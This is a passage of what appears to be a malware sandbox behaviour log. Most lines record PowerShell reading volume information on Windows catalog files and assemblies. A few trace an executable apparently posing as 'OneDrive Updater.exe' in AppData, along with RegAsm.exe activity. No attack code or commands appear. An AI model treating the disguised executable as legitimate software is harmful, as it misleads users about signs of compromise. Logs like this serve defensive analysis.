                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
